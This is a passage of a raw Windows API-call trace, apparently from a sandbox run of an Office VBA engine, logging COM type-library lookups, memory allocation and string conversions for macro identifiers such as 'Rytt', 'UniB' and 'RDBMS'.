[0033.227] IUnknown:Release (This=0x782b300) returned 0x6 [0033.227] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.227] IUnknown:Release (This=0x782a220) returned 0x16 [0033.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a520ce, cbMultiByte=9, lpWideCharStr=0x2e46c0, cchWideChar=8 | out: lpWideCharStr="BltFast") returned 0 [0033.227] wcscpy_s (in: _Destination=0xb5c81d0, _SizeInWords=0x8, _Source="BltFast" | out: _Destination="BltFast") returned 0x0 [0033.227] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.227] ITypeInfo:RemoteGetTypeAttr (in: This=0x784d100, ppTypeAttr=0x2e4770, pDummy=0x0 | out: ppTypeAttr=0x2e4770, pDummy=0x0) returned 0x0 [0033.227] ITypeInfo:LocalReleaseTypeAttr (This=0x784d100) returned 0x0 [0033.227] IMalloc:Free (This=0x7fefe015380, pv=0xb5a5cd0) [0033.228] SetErrorMode (uMode=0x8001) returned 0x8005 [0033.228] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0033.228] SetErrorMode (uMode=0x8005) returned 0x8005 [0033.228] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2ad) returned 0x7fee3738ff4 [0033.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52ca0c, cbMultiByte=2, lpWideCharStr=0x9e4046c, cchWideChar=6 | out: lpWideCharStr="Se") returned 2 [0033.229] IUnknown:AddRef (This=0xb5a5078) returned 0x6 [0033.229] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5a5078, index=0xffffffff, pRefType=0x2e45f0 | out: pRefType=0x2e45f0*=0xfffffffe) returned 0x0 [0033.229] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0xfffffffe, ppTInfo=0x2e46c8 | out: ppTInfo=0x2e46c8*=0xb5a5018) returned 0x0 [0033.229] IUnknown:Release (This=0xb5a5078) returned 0x5 [0033.229] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5018, hreftype=0x31, ppTInfo=0x2e3e58 | out: ppTInfo=0x2e3e58*=0xb5b2048) returned 0x0 [0033.229] IUnknown:QueryInterface (in: This=0xb5b2048, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4028 | out: ppvObject=0x2e4028*=0x0) returned 0x80004002 [0033.229] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2048, ppTypeAttr=0x2e3ea8, pDummy=0x10 | out: ppTypeAttr=0x2e3ea8, pDummy=0x10) returned 0x0 [0033.229] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2048) returned 0x0 [0033.229] IUnknown:QueryInterface (in: This=0xb5b2048, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3bb0 | out: ppvObject=0x2e3bb0*=0x0) returned 0x80004002 [0033.229] IUnknown:QueryInterface (in: This=0xb5b2048, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3ba0 | out: ppvObject=0x2e3ba0*=0x0) returned 0x80004002 [0033.229] IUnknown:QueryInterface (in: This=0xb5b2048, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3ba8 | out: ppvObject=0x2e3ba8*=0x0) returned 0x80004002 [0033.229] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2048, ppTypeAttr=0x2e3bd8, pDummy=0x10 | out: ppTypeAttr=0x2e3bd8, pDummy=0x10) returned 0x0 [0033.229] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2048) returned 0x0 [0033.229] IUnknown:AddRef (This=0xb5b2048) returned 0x3 [0033.229] IUnknown:QueryInterface (in: This=0xb5b2048, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3d50 | out: ppvObject=0x2e3d50*=0x0) returned 0x80004002 [0033.229] IUnknown:QueryInterface (in: This=0xb5b2048, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3d48 | out: ppvObject=0x2e3d48*=0x0) returned 0x80004002 [0033.229] IUnknown:Release (This=0xb5b2048) returned 0x2 [0033.229] IUnknown:AddRef (This=0xb5b2048) returned 0x3 [0033.229] IUnknown:AddRef (This=0xb5b2048) returned 0x3 [0033.229] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4ac8, pDummy=0x0 | out: ppTypeAttr=0x2e4ac8, pDummy=0x0) returned 0x0 [0033.229] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.230] IUnknown:Release (This=0xb5a5018) returned 0x6 [0033.230] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.230] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4060, pDummy=0x0 | out: ppTypeAttr=0x2e4060, pDummy=0x0) returned 0x0 [0033.230] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.230] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x75dc4b0 [0033.230] IUnknown:Release (This=0xb5b2048) returned 0x2 [0033.230] IUnknown:QueryInterface (in: This=0xb5b1ee8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4690 | out: ppvObject=0x2e4690*=0x0) returned 0x80004002 [0033.230] IUnknown:QueryInterface (in: This=0xb5b1ee8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4660 | out: ppvObject=0x2e4660*=0x0) returned 0x80004002 [0033.230] IUnknown:QueryInterface (in: This=0xb5b1ee8, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4650 | out: ppvObject=0x2e4650*=0x0) returned 0x80004002 [0033.230] IUnknown:QueryInterface (in: This=0xb5b1ee8, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4658 | out: ppvObject=0x2e4658*=0x0) returned 0x80004002 [0033.230] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1ee8, ppTypeAttr=0x2e4688, pDummy=0x10 | out: ppTypeAttr=0x2e4688, pDummy=0x10) returned 0x0 [0033.230] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1ee8) returned 0x0 [0033.230] IUnknown:AddRef (This=0xb5b1ee8) returned 0x3 [0033.230] IUnknown:AddRef (This=0xb5b1ee8) returned 0x3 [0033.230] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1ee8, ppTypeAttr=0x2e4ac8, pDummy=0x9e408b2 | out: ppTypeAttr=0x2e4ac8, pDummy=0x9e408b2*=0x0) returned 0x0 [0033.230] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1ee8) returned 0x0 [0033.230] IUnknown:Release (This=0xb5b1ee8) returned 0x2 [0033.230] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.230] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1ee8, ppTypeAttr=0x2e4060, pDummy=0x0 | out: ppTypeAttr=0x2e4060, pDummy=0x0) returned 0x0 [0033.230] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1ee8) returned 0x0 [0033.230] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rytt") returned 0x10756e [0033.230] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x5, _Src="Rytt" | out: _Dst="Rytt") returned 0x0 [0033.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=5, lpWideCharStr=0x2e44f0, cchWideChar=5 | out: lpWideCharStr="Rytt") returned 5 [0033.231] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.231] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Rytt", lHashVal=0x10756e, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.231] IUnknown:Release (This=0x782a220) returned 0x16 [0033.231] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.231] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Rytt", lHashVal=0x10756e, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.231] IUnknown:Release (This=0x731da90) returned 0x15 [0033.231] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.231] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Rytt", lHashVal=0x10756e, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.231] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.231] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.231] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="Rytt", lHashVal=0x10756e, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.231] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.231] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb4963f0 [0033.231] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Rytt") returned 0x10dada [0033.231] strcpy_s (in: _Dst=0x2e4850, _DstSize=0xc, _Src="_B_var_Rytt" | out: _Dst="_B_var_Rytt") returned 0x0 [0033.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=12, lpWideCharStr=0x2e46a0, cchWideChar=12 | out: lpWideCharStr="_B_var_Rytt") returned 12 [0033.231] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.231] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Rytt", lHashVal=0x10dada, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.231] IUnknown:Release (This=0x782a220) returned 0x16 [0033.231] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.231] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Rytt", lHashVal=0x10dada, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.231] IUnknown:Release (This=0x731da90) returned 0x15 [0033.231] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.231] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Rytt", lHashVal=0x10dada, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.231] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.231] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.231] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Rytt", lHashVal=0x10dada, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.231] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.231] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.231] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Rytt", lHashVal=0x10dada, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.231] IUnknown:Release (This=0x782b300) returned 0x6 [0033.231] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.231] IUnknown:Release (This=0x782a220) returned 0x16 [0033.231] IUnknown:AddRef (This=0xb5a5078) returned 0x7 [0033.231] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5a5078, index=0xffffffff, pRefType=0x2e45f0 | out: pRefType=0x2e45f0*=0xfffffffe) returned 0x0 [0033.231] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0xfffffffe, ppTInfo=0x2e46c8 | out: ppTInfo=0x2e46c8*=0xb5a5018) returned 0x0 [0033.231] IUnknown:Release (This=0xb5a5078) returned 0x6 [0033.231] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5018, hreftype=0x49, ppTInfo=0x2e3e58 | out: ppTInfo=0x2e3e58*=0xb5b2308) returned 0x0 [0033.231] IUnknown:QueryInterface (in: This=0xb5b2308, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4028 | out: ppvObject=0x2e4028*=0x0) returned 0x80004002 [0033.232] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2308, ppTypeAttr=0x2e3ea8, pDummy=0x10 | out: ppTypeAttr=0x2e3ea8, pDummy=0x10) returned 0x0 [0033.232] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2308) returned 0x0 [0033.232] IUnknown:Release (This=0xb5b2308) returned 0x2 [0033.232] IUnknown:AddRef (This=0xb5b2308) returned 0x3 [0033.232] IUnknown:AddRef (This=0xb5b2308) returned 0x3 [0033.232] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4ac8, pDummy=0x0 | out: ppTypeAttr=0x2e4ac8, pDummy=0x0) returned 0x0 [0033.232] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.232] IUnknown:Release (This=0xb5a5018) returned 0x7 [0033.232] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.232] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4060, pDummy=0x0 | out: ppTypeAttr=0x2e4060, pDummy=0x0) returned 0x0 [0033.232] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.232] IUnknown:Release (This=0xb5b2308) returned 0x2 [0033.232] IUnknown:AddRef (This=0xb5b23b8) returned 0x4 [0033.232] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b23b8, ppTypeAttr=0x2e4ac8, pDummy=0x9e4151a | out: ppTypeAttr=0x2e4ac8, pDummy=0x9e4151a*=0x0) returned 0x0 [0033.232] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b23b8) returned 0x0 [0033.232] IUnknown:Release (This=0xb5b23b8) returned 0x3 [0033.232] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.232] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b23b8, ppTypeAttr=0x2e4060, pDummy=0x0 | out: ppTypeAttr=0x2e4060, pDummy=0x0) returned 0x0 [0033.232] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b23b8) returned 0x0 [0033.232] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0033.232] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x2, _Src="I" | out: _Dst="I") returned 0x0 [0033.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=2, lpWideCharStr=0x2e44f0, cchWideChar=2 | out: lpWideCharStr="I") returned 2 [0033.232] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.232] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="I", lHashVal=0x101060, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.233] IUnknown:Release (This=0x782a220) returned 0x16 [0033.233] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.233] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="I", lHashVal=0x101060, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.233] IUnknown:Release (This=0x731da90) returned 0x15 [0033.233] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.233] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="I", lHashVal=0x101060, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.233] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.233] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.233] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="I", lHashVal=0x101060, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.233] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.233] IMalloc:Alloc (This=0x7fefe015380, cb=0x9) returned 0xb4963f0 [0033.233] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_I") returned 0x10a209 [0033.233] strcpy_s (in: _Dst=0x2e4850, _DstSize=0x9, _Src="_B_var_I" | out: _Dst="_B_var_I") returned 0x0 [0033.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=9, lpWideCharStr=0x2e46a0, cchWideChar=9 | out: lpWideCharStr="_B_var_I") returned 9 [0033.233] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.233] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_I", lHashVal=0x10a209, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.233] IUnknown:Release (This=0x782a220) returned 0x16 [0033.233] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.233] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_I", lHashVal=0x10a209, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.233] IUnknown:Release (This=0x731da90) returned 0x15 [0033.233] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.233] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_I", lHashVal=0x10a209, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.233] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.233] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.233] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_I", lHashVal=0x10a209, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.233] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.233] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.233] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_I", lHashVal=0x10a209, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.233] IUnknown:Release (This=0x782b300) returned 0x6 [0033.233] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.233] IUnknown:Release (This=0x782a220) returned 0x16 [0033.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52ca84, cbMultiByte=5, lpWideCharStr=0x9e42956, cchWideChar=12 | out: lpWideCharStr="RDBMS") returned 5 [0033.233] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.233] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x784d158, ppTLib=0x2e4440, pIndex=0x0 | out: ppTLib=0x2e4440*=0x782a220, pIndex=0x0) returned 0x0 [0033.233] ITypeLib:RemoteGetLibAttr (in: This=0x782a220, ppTLibAttr=0x2e4480, pDummy=0x0 | out: ppTLibAttr=0x2e4480, pDummy=0x0) returned 0x0 [0033.233] ITypeLib:LocalReleaseTLibAttr (This=0x782a220) returned 0x0 [0033.233] IUnknown:Release (This=0x782a220) returned 0x17 [0033.233] ITypeInfo:LocalReleaseVarDesc (This=0x784d158) returned 0x0 [0033.233] IUnknown:QueryInterface (in: This=0x784d158, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e47b0 | out: ppvObject=0x2e47b0*=0x0) returned 0x80004002 [0033.234] IUnknown:QueryInterface (in: This=0x784d158, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4780 | out: ppvObject=0x2e4780*=0x0) returned 0x80004002 [0033.234] IUnknown:QueryInterface (in: This=0x784d158, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4770 | out: ppvObject=0x2e4770*=0x0) returned 0x80004002 [0033.234] IUnknown:QueryInterface (in: This=0x784d158, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4778 | out: ppvObject=0x2e4778*=0x0) returned 0x80004002 [0033.234] ITypeInfo:RemoteGetTypeAttr (in: This=0x784d158, ppTypeAttr=0x2e47a8, pDummy=0x10 | out: ppTypeAttr=0x2e47a8, pDummy=0x10) returned 0x0 [0033.234] ITypeInfo:LocalReleaseTypeAttr (This=0x784d158) returned 0x0 [0033.234] IUnknown:AddRef (This=0x784d158) returned 0x3 [0033.234] ITypeInfo:GetRefTypeInfo (in: This=0x784cf48, hreftype=0x680, ppTInfo=0x2e4438 | out: ppTInfo=0x2e4438*=0x784d158) returned 0x0 [0033.234] IUnknown:QueryInterface (in: This=0x784d158, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4608 | out: ppvObject=0x2e4608*=0x0) returned 0x80004002 [0033.234] ITypeInfo:RemoteGetTypeAttr (in: This=0x784d158, ppTypeAttr=0x2e4488, pDummy=0x10 | out: ppTypeAttr=0x2e4488, pDummy=0x10) returned 0x0 [0033.234] ITypeInfo:LocalReleaseTypeAttr (This=0x784d158) returned 0x0 [0033.234] IUnknown:QueryInterface (in: This=0x784d158, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4190 | out: ppvObject=0x2e4190*=0x0) returned 0x80004002 [0033.234] IUnknown:QueryInterface (in: This=0x784d158, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4180 | out: ppvObject=0x2e4180*=0x0) returned 0x80004002 [0033.234] IUnknown:QueryInterface (in: This=0x784d158, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4188 | out: ppvObject=0x2e4188*=0x0) returned 0x80004002 [0033.234] ITypeInfo:RemoteGetTypeAttr (in: This=0x784d158, ppTypeAttr=0x2e41b8, pDummy=0x10 | out: ppTypeAttr=0x2e41b8, pDummy=0x10) returned 0x0 [0033.234] ITypeInfo:LocalReleaseTypeAttr (This=0x784d158) returned 0x0 [0033.234] IUnknown:AddRef (This=0x784d158) returned 0x4 [0033.234] IUnknown:QueryInterface (in: This=0x784d158, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4330 | out: ppvObject=0x2e4330*=0x0) returned 0x80004002 [0033.234] IUnknown:QueryInterface (in: This=0x784d158, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4328 | out: ppvObject=0x2e4328*=0x0) returned 0x80004002 [0033.234] IUnknown:Release (This=0x784d158) returned 0x3 [0033.234] IUnknown:AddRef (This=0x784d158) returned 0x4 [0033.234] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.235] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb5c8500 [0033.235] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0033.235] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x5, _Src="UniB" | out: _Dst="UniB") returned 0x0 [0033.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=5, lpWideCharStr=0x2e44f0, cchWideChar=5 | out: lpWideCharStr="UniB") returned 5 [0033.235] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.235] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="UniB", lHashVal=0x109f6f, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.235] IUnknown:Release (This=0x782a220) returned 0x1a [0033.235] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.235] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="UniB", lHashVal=0x109f6f, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.235] IUnknown:Release (This=0x731da90) returned 0x15 [0033.235] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.235] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="UniB", lHashVal=0x109f6f, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.235] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.235] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.235] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="UniB", lHashVal=0x109f6f, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.235] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.235] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb4963f0 [0033.235] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_UniB") returned 0x10049c [0033.235] strcpy_s (in: _Dst=0x2e4850, _DstSize=0xc, _Src="_B_var_UniB" | out: _Dst="_B_var_UniB") returned 0x0 [0033.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, 